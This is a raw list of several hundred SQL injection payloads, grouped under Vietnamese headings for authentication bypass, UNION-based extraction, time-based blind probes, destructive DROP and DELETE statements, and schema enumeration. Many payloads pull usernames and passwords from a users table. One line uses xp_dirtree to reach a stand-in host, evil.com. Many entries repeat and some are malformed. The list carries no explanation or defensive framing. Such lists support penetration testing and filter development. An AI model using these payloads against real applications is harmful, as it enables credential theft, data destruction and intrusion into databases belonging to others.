' OR '1' = '1
' OR 1=1 --
' UNION SELECT null, null, null --
' OR 1=1 -- 
' OR 1=1; SHOW TABLES --
' AND 1=CONVERT(int, (SELECT @@version)) --
' ; DROP TABLE users; --
' AND 1=1 -- 
' AND 1=2 --
' OR IF(1=1, SLEEP(5), 0) -- 
' -- 
' # 
' OR 'x' = 'x
' ; SELECT * FROM information_schema.tables --
' AND 1=1 --
' AND 1=2 --
' OR EXISTS(SELECT * FROM users WHERE username='admin') --
' AND SLEEP(5) --
' ; EXEC xp_dirtree '\\evil.com\malicious' --
' UNION SELECT GROUP_CONCAT(username, ':', password) FROM users --
' ; SELECT * FROM openrowset('MSAccess', 'C:\\malicious.mdb') --
' ; DROP TABLE users; --
'; DROP TABLE users; --
' OR '1' = '1
' OR 'a' = 'a
' AND 1=1
' AND 1=2
' OR 1=1 --
' OR 'x' = 'x' --
' OR 1=1 /*
' AND 1=1 --
' AND 1=2 /*
admin' --
admin' #
' OR 'a' = 'b' --
'; DROP TABLE users; --
'; SELECT * FROM information_schema.tables; --
'; SELECT table_name FROM information_schema.tables --
'; SELECT column_name FROM information_schema.columns WHERE table_name = 'users' --
'; SELECT username, password FROM users --
'; INSERT INTO users (username, password) VALUES ('attacker', 'password') --
'; UPDATE users SET password = 'hacked' WHERE username = 'admin' --
'; DELETE FROM users WHERE username = 'admin' --
'; SELECT @@version --
' AND 1=1; --
' OR 1=1 LIMIT 1; --
' OR 1=1 OFFSET 0; --
' UNION SELECT null, null, null --
' UNION SELECT username, password FROM users --
' UNION SELECT 1, 2, 3, 4 --
' UNION SELECT null, table_name, column_name FROM information_schema.columns --
' UNION SELECT NULL, GROUP_CONCAT(username, ':', password) FROM users --
' OR EXISTS(SELECT * FROM users WHERE username = 'admin') --
' AND EXISTS(SELECT * FROM users WHERE username = 'admin') --
' AND 1=1 UNION SELECT 1, user(), 3 --
' AND 1=1 UNION SELECT 1, 2, database() --
' OR 1=1 AND user() = 'root' --
' OR 1=1 AND password LIKE '%admin%' --
' AND SLEEP(5) --
' AND BENCHMARK(1000000, MD5(1)) --
' AND ASCII(SUBSTRING(@@version, 1, 1)) = 52 --
' AND SUBSTRING(@@version, 1, 1) = '5' --
' AND LENGTH('test') = 4 --
' AND SUBSTRING((SELECT database()), 1, 1) = 'a' --
' AND 1=1 AND sleep(5) --
' AND IF(1=1, SLEEP(5), 0) --
' OR (SELECT COUNT(*) FROM users) > 0 --
' AND (SELECT COUNT(*) FROM information_schema.tables) > 0 --
' AND (SELECT COUNT(*) FROM users WHERE username = 'admin') > 0 --
' AND (SELECT SUBSTRING(password, 1, 1) FROM users WHERE username = 'admin') = 'p' --
' OR 1=1 AND (SELECT COUNT(*) FROM users WHERE username = 'admin') > 0 --
' AND 1=1; SELECT * FROM users --
' OR (SELECT user()) = 'root' --
' OR 1=1; SELECT * FROM mysql.db --
' UNION SELECT null, null, version() --
' UNION SELECT null, table_name FROM information_schema.tables --
' UNION SELECT null, column_name FROM information_schema.columns WHERE table_name = 'users' --
' UNION SELECT null, GROUP_CONCAT(username, ':', password) FROM users --
' AND SELECT 1, 2, table_name FROM information_schema.tables --
' AND SELECT 1, 2, column_name FROM information_schema.columns --
' AND SUBSTRING(username, 1, 1) = 'a' --
' OR SELECT * FROM users WHERE username = 'admin' AND password = '' --
' OR SELECT * FROM users WHERE username = 'admin' AND password = 'password' --
' OR SELECT * FROM users WHERE username = 'admin' AND password LIKE 'p%' --
' UNION SELECT null, username, password FROM users --
' UNION SELECT null, null, null, null FROM information_schema.tables --
' UNION SELECT null, null, null FROM information_schema.columns --
' UNION SELECT null, null, database() --
' OR 1=1; SELECT database() --
' OR 1=1; SELECT * FROM mysql.user --
' UNION SELECT null, null, user() --
' UNION SELECT null, null, @@hostname --
' AND 1=1; SELECT password FROM users WHERE username = 'admin' --
' AND 1=1 AND user() = 'root' --
' OR (SELECT COUNT(*) FROM users WHERE username = 'admin') > 0 --
' OR (SELECT table_name FROM information_schema.tables WHERE table_schema = 'mydb') --
' UNION SELECT null, null, password FROM users WHERE username = 'admin' --
' AND 1=1; SELECT table_name FROM information_schema.tables --
' AND 1=1; SELECT column_name FROM information_schema.columns WHERE table_name = 'users' --
' AND 1=1; SELECT username, password FROM users --
' UNION SELECT null, null, count(*) FROM users --
' UNION SELECT null, null, null FROM users WHERE 1=1 --
' UNION SELECT null, database(), null FROM users --
' AND SUBSTRING(@@version, 1, 1) = '5' --
' AND IF(1=1, SLEEP(10), 0) --
' AND ASCII(SUBSTRING((SELECT database()), 1, 1)) = 65 --
' AND 1=1; SELECT username, password FROM users --
' AND 1=1 UNION SELECT null, username, password FROM users --
' AND (SELECT COUNT(*) FROM users WHERE username = 'admin') > 1 --
' UNION SELECT null, table_name, column_name FROM information_schema.columns --
' OR 1=1 UNION SELECT null, version(), null --
' UNION SELECT null, null, null FROM users WHERE 1=1 --
' OR 1=1; SELECT * FROM mysql.tables --
' OR 1=1 AND (SELECT COUNT(*) FROM users WHERE username = 'admin') > 0 --
' UNION SELECT null, NULL, GROUP_CONCAT(username, ':', password) FROM users --
' AND EXISTS(SELECT * FROM users WHERE username = 'admin') --
' OR 1=1; SELECT @@version --
' OR 1=1; SELECT * FROM information_schema.columns --
' AND 1=1; SELECT table_name FROM information_schema.tables --
' AND 1=1; SELECT username FROM users WHERE username = 'admin' --
' AND 1=1; SELECT * FROM information_schema.tables --
' AND 1=1; SELECT * FROM users WHERE username = 'admin' --
' OR 1=1; SELECT * FROM mysql.db --
' AND 1=1; --
' OR 1=1 --
' UNION SELECT NULL, NULL, NULL --
' OR EXISTS(SELECT * FROM users WHERE username = 'admin') --
' AND 1=1 AND user() = 'root' --
' UNION SELECT NULL, null, null FROM mysql.user --
' UNION SELECT NULL, null, version() --
' AND 1=1 AND SLEEP(5) --
' AND ASCII(SUBSTRING(user(), 1, 1)) = 66 --
' AND LENGTH('test') = 4 --
' AND 1=1; SELECT table_name FROM information_schema.tables --
' AND 1=1; SELECT column_name FROM information_schema.columns WHERE table_name = 'users' --
' OR SELECT * FROM users WHERE username = 'admin' AND password = 'password' --
' UNION SELECT NULL, null, username, password FROM users --
' UNION SELECT NULL, GROUP_CONCAT(username, ':', password) FROM users --
' OR (SELECT COUNT(*) FROM users) = 0 --
' AND SUBSTRING((SELECT user()), 1, 1) = 'r' --
' OR 1=1; SELECT * FROM information_schema.columns --
' AND IF(1=1, SLEEP(10), 0) --
' UNION SELECT NULL, NULL, GROUP_CONCAT(username, ':', password) FROM users --
' OR 1=1 AND user() = 'root' --
' OR 1=1 AND password LIKE '%admin%' --
' AND SELECT username, password FROM users WHERE username = 'admin' --
' AND SUBSTRING(username, 1, 1) = 'a' --
' OR 1=1; SELECT * FROM mysql.tables --
' UNION SELECT NULL, NULL, NULL, null FROM users --
' UNION SELECT NULL, NULL, user() --
' AND SELECT * FROM users WHERE username = 'admin' --
' UNION SELECT NULL, NULL, database() --
' OR 1=1 AND user() = 'root' --
' AND EXISTS(SELECT * FROM users WHERE username = 'admin') --
' UNION SELECT NULL, NULL, password FROM users WHERE username = 'admin' --
' OR (SELECT COUNT(*) FROM users WHERE username = 'admin') > 0 --
' OR (SELECT table_name FROM information_schema.tables WHERE table_schema = 'mydb') --
' UNION SELECT NULL, NULL, null FROM users WHERE 1=1 --
' AND SUBSTRING((SELECT database()), 1, 1) = 'm' --
' OR SELECT * FROM users WHERE username = 'admin' --
' UNION SELECT NULL, null, null FROM information_schema.tables --
' OR SELECT 1, user(), 3 --
' AND 1=1 AND (SELECT COUNT(*) FROM users WHERE username = 'admin') > 1 --
' OR (SELECT COUNT(*) FROM users WHERE username = 'admin') > 0 --
' UNION SELECT NULL, NULL, count(*) FROM users --
' UNION SELECT NULL, NULL, null FROM users WHERE 1=1 --
' OR 1=1 AND SELECT * FROM mysql.user --
' OR 1=1 UNION SELECT null, null, password FROM users --
' OR 1=1 AND user() = 'root' --
' UNION SELECT NULL, NULL, version() --
' AND 1=1 AND SUBSTRING((SELECT database()), 1, 1) = 'd' --
' AND 1=1 AND SELECT username, password FROM users WHERE username = 'admin' --
' AND 1=1 AND SELECT * FROM information_schema.columns --
' AND 1=1; SELECT * FROM information_schema.tables --
' OR 1=1; SELECT table_name FROM information_schema.tables --
' UNION SELECT NULL, NULL, GROUP_CONCAT(username, ':', password) FROM users --
' OR 1=1 AND password LIKE '%password%' --
' AND (SELECT COUNT(*) FROM users WHERE username = 'admin') > 0 --
' AND 1=1 UNION SELECT null, username, password FROM users --
' UNION SELECT NULL, NULL, NULL, null FROM information_schema.tables --
' OR 1=1; SELECT * FROM mysql.user --
' AND 1=1 UNION SELECT NULL, username, password FROM users --
' UNION SELECT NULL, database(), null FROM users --
' AND 1=1 AND (SELECT SUBSTRING(password, 1, 1) FROM users WHERE username = 'admin') = 'p' --
' UNION SELECT NULL, NULL, NULL FROM users WHERE 1=1 --
' UNION SELECT NULL, username, password FROM users WHERE username = 'admin' --
' AND 1=1 AND SELECT * FROM mysql.db --
' OR 1=1; SELECT * FROM information_schema.tables --
' AND 1=1; SELECT column_name FROM information_schema.columns WHERE table_name = 'users' --
' AND 1=1 AND SUBSTRING((SELECT user()), 1, 1) = 'r' --
' AND 1=1 AND SLEEP(5) --
' AND 1=1 AND SELECT username, password FROM users WHERE username = 'admin' --
' UNION SELECT NULL, NULL, null FROM mysql.user --
' OR 1=1; SELECT * FROM mysql.db --
' UNION SELECT NULL, NULL, NULL FROM users --
' UNION SELECT NULL, NULL, user() --
' UNION SELECT NULL, NULL, database() --
' UNION SELECT NULL, username, password FROM users --
' OR 1=1; SELECT database() --
' OR SELECT * FROM users WHERE username = 'admin' AND password = 'password' --
' UNION SELECT NULL, NULL, password FROM users WHERE username = 'admin' --
' UNION SELECT NULL, NULL, table_name FROM information_schema.tables --
' OR 1=1 UNION SELECT null, username, password FROM users --
' AND EXISTS(SELECT * FROM users WHERE username = 'admin') --
' OR 1=1 AND user() = 'root' --
' UNION SELECT NULL, NULL, NULL FROM users --
' AND 1=1 UNION SELECT NULL, NULL, NULL FROM information_schema.columns --
' UNION SELECT NULL, username, password FROM users WHERE username = 'admin' --
' OR (SELECT COUNT(*) FROM users WHERE username = 'admin') > 0 --
' AND SUBSTRING((SELECT database()), 1, 1) = 'm' --
' AND 1=1; SELECT username FROM users WHERE username = 'admin' --
' OR 1=1; SELECT username, password FROM users --
' OR 1=1; SELECT * FROM information_schema.columns --
' UNION SELECT NULL, NULL, GROUP_CONCAT(username, ':', password) FROM users --
' AND 1=1; SELECT * FROM information_schema.tables --
' OR 1=1 UNION SELECT NULL, NULL, username, password FROM users --
' OR 1=1; SELECT * FROM mysql.tables --
' AND 1=1 UNION SELECT null, database(), null FROM users --
' AND 1=1; SELECT column_name FROM information_schema.columns WHERE table_name = 'users' --
' OR 1=1 UNION SELECT NULL, null, null FROM information_schema.tables --
' AND 1=1 UNION SELECT null, version(), null FROM users --
' OR 1=1 AND (SELECT COUNT(*) FROM users WHERE username = 'admin') > 0 --
' UNION SELECT NULL, NULL, username FROM users --
' OR 1=1 --
' OR 'a'='a' --
' OR 1=1#
' OR '1'='1' --
' OR 1=1 /*
' OR 'x'='x' --
' OR '1'='1' /*
' OR 1=1; --
' OR 1=1 --
' OR 'x' = 'x' --
' OR 'x'='x' -- --
' OR '' = '' --
' OR 1=1/*
' OR 'test' = 'test' --
' OR 1=1# --
' OR 1=1#
' OR 1=1 --
' OR 'admin' = 'admin' --
' OR '' = '' --
' OR 0=0 --
21-40: Câu lệnh UNION SELECT để lấy thông tin từ bảng khác
' UNION SELECT null, null, null, null --
' UNION SELECT 1, 2, 3, 4 --
' UNION SELECT null, username, password FROM users --
' UNION SELECT username, password, email FROM users --
' UNION SELECT null, username, password, email FROM users --
' UNION SELECT null, null, null, null FROM users --
' UNION SELECT username, password FROM users WHERE username = 'admin' --
' UNION SELECT null, null, password FROM users WHERE username = 'admin' --
' UNION SELECT username, email, password FROM users WHERE username = 'admin' --
' UNION SELECT null, null, null, password FROM users --
' UNION SELECT username, password, email, phone FROM users --
' UNION SELECT username, email, address FROM users --
' UNION SELECT null, null, null, null, null FROM orders --
' UNION SELECT 1, 2, username, password FROM users --
' UNION SELECT username, password, email FROM users LIMIT 1 --
' UNION SELECT username, password, email FROM users ORDER BY 1 --
' UNION SELECT username, password FROM users ORDER BY 2 --
' UNION SELECT username, password, email, phone FROM users WHERE username = 'admin' --
' UNION SELECT null, email, username FROM users WHERE username = 'admin' --
' UNION SELECT username, password FROM users WHERE username = 'guest' --
41-60: Tấn công với SLEEP để thử nghiệm trễ
' OR SLEEP(5) --
' OR 1=1 AND SLEEP(5) --
' AND SLEEP(5) --
' OR SLEEP(10) --
' OR 1=1 AND SLEEP(10) --
' OR 'x' = 'x' AND SLEEP(5) --
' OR 1=1/* AND SLEEP(5) --
' AND 1=1 AND SLEEP(5) --
' OR 1=1; SLEEP(10) --
' OR 1=1# SLEEP(5) --
' AND 1=1; SLEEP(10) --
' OR SLEEP(3) --
' OR 1=1 AND SLEEP(20) --
' OR '1' = '1' AND SLEEP(30) --
' OR 1=1 AND SLEEP(15) --
' AND 1=1; SLEEP(20) --
' AND 1=1 -- SLEEP(10) --
' OR 'x' = 'x' AND SLEEP(3) --
' OR SLEEP(7) --
' OR SLEEP(5) AND 1=1 --
61-80: Sử dụng DROP TABLE hoặc DELETE để thử tấn công phá hoại
' DROP TABLE users --
' DROP DATABASE test --
' DELETE FROM users WHERE username = 'admin' --
' DELETE FROM users WHERE username = 'test' --
' DROP TABLE orders --
' DROP COLUMN email FROM users --
' DROP TABLE orders WHERE 1=1 --
' DELETE FROM users WHERE email = 'attacker@example.com' --
' DROP DATABASE students --
' DROP DATABASE users --
' DROP TABLE employees --
' DELETE FROM users WHERE username = 'admin' --
' DELETE FROM users WHERE username = 'attacker' --
' DROP TABLE products --
' DELETE FROM users WHERE email = 'admin@domain.com' --
' DELETE FROM orders WHERE 1=1 --
' DROP TABLE orders; DROP TABLE users --
' DROP TABLE test_users --
' DROP DATABASE orders --
' DELETE FROM orders WHERE order_id = 1 --
81-100: Các câu lệnh khác để kiểm tra sự tồn tại của bảng hoặc cột, và các truy vấn để dò cấu trúc
' SELECT * FROM information_schema.tables --
' SELECT table_name FROM information_schema.tables --
' SELECT column_name FROM information_schema.columns WHERE table_name = 'users' --
' SELECT * FROM users WHERE username = '' AND 1=1 --
' SELECT * FROM users WHERE username = '' AND 1=2 --
' SELECT * FROM users WHERE username = 'admin' --
' SELECT username, email, password FROM users WHERE 1=1 --
' SELECT COUNT(*) FROM users WHERE username = 'admin' --
' SELECT * FROM users WHERE username = 'admin' AND email LIKE '%@gmail.com%' --
' SELECT * FROM users WHERE username = 'admin' AND email LIKE '%@example.com%' --
' SELECT column_name FROM information_schema.columns WHERE table_name = 'users' LIMIT 1 --
' SELECT * FROM users WHERE username = 'admin' AND password LIKE '%admin%' --
' SELECT username FROM users WHERE username = 'admin' LIMIT 1 --
' SELECT username, password FROM users WHERE username = 'admin' OR 1=1 --
' SELECT * FROM users WHERE username = '' OR 1=1 --
' SELECT * FROM users WHERE email = '' OR 1=1 --
' SELECT * FROM orders WHERE order_id = '1' AND 1=1 --
' SELECT * FROM products WHERE product_name = '' OR 1=1 --
' SELECT * FROM products WHERE product_name = 'Laptop' --
' SELECT * FROM products WHERE 1=1 --
1-20: Các câu lệnh với OR và AND (không dùng dấu nháy đơn)
1=1 --
1=1#
1=1/*
0=0 --
0=0#
0=0/*
1=1 AND 1=1 --
1=1 AND 1=0 --
1=0 AND 0=0 --
1=1 AND 2=2 --
1=0 AND 2=1 --
1=1 AND 1=2 --
0=1 AND 2=2 --
1=1 AND 1=1/*
2=2 AND 1=1/*
1=1 AND 2=2#
1=0 AND 0=1#
1=1 AND 1=0 --
0=0 AND 1=1#
1=1 AND 1=1/*
21-40: Các câu lệnh với OR và các toán tử khác
1=2 OR 1=1 --
1=2 OR 1=1#
0=1 OR 1=1 --
0=0 OR 1=1 --
2=3 OR 1=1#
0=0 OR 1=0#
1=0 OR 1=0 --
0=0 OR 0=1 --
1=0 OR 0=0#
2=2 OR 3=3 --
2=2 OR 1=1/*
0=0 OR 0=0/*
1=1 OR 0=0#
1=1 OR 1=0/*
0=1 OR 1=1 --
0=1 OR 2=2#
1=1 OR 0=0#
1=1 OR 0=0 --
1=1 OR 1=0/*
0=1 OR 0=1 --
41-60: Câu lệnh sử dụng AND để kiểm tra bảng hoặc cột
AND 1=1 --
AND 2=2 --
AND 3=3#
AND 4=4/*
AND 1=1 --
AND 2=3 --
AND 5=5 --
AND 6=6/*
AND 1=1 --
AND 2=2#
AND 3=3 --
AND 1=0 --
AND 1=1/*
AND 5=6 --
AND 1=1 AND 1=1 --
AND 1=1 AND 2=2#
AND 3=3 AND 4=4 --
AND 1=2 AND 1=2/*
AND 1=1 AND 0=0 --
AND 1=1 AND 1=0#
61-80: Dò bảng và cột trong cơ sở dữ liệu
AND 1=1 AND table_name = 'users' --
AND 1=1 AND column_name = 'email' --
AND 1=1 AND table_name = 'products' --
AND 1=1 AND table_name = 'orders' --
AND 1=1 AND column_name = 'password' --
AND 1=1 AND column_name = 'username' --
AND 1=1 AND table_name = 'employees' --
AND 1=1 AND column_name = 'address' --
AND 1=1 AND table_name = 'accounts' --
AND 1=1 AND table_name = 'transactions' --
AND 1=1 AND column_name = 'phone' --
AND 1=1 AND table_name = 'payments' --
AND 1=1 AND column_name = 'amount' --
AND 1=1 AND table_name = 'comments' --
AND 1=1 AND column_name = 'rating' --
AND 1=1 AND table_name = 'reviews' --
AND 1=1 AND column_name = 'product_name' --
AND 1=1 AND table_name = 'orders' AND column_name = 'order_id' --
AND 1=1 AND table_name = 'users' AND column_name = 'email' --
AND 1=1 AND table_name = 'products' AND column_name = 'description' --
81-100: Các câu lệnh với GROUP BY, ORDER BY và các câu lệnh khác
GROUP BY 1 --
GROUP BY column_name --
GROUP BY username --
GROUP BY password --
ORDER BY 1 --
ORDER BY username --
ORDER BY password --
ORDER BY email --
ORDER BY address --
ORDER BY amount --
ORDER BY rating --
ORDER BY product_name --
ORDER BY id --
ORDER BY order_id --
ORDER BY 2 --
GROUP BY product_name --
GROUP BY order_id --
ORDER BY 3 --
ORDER BY price --
GROUP BY price --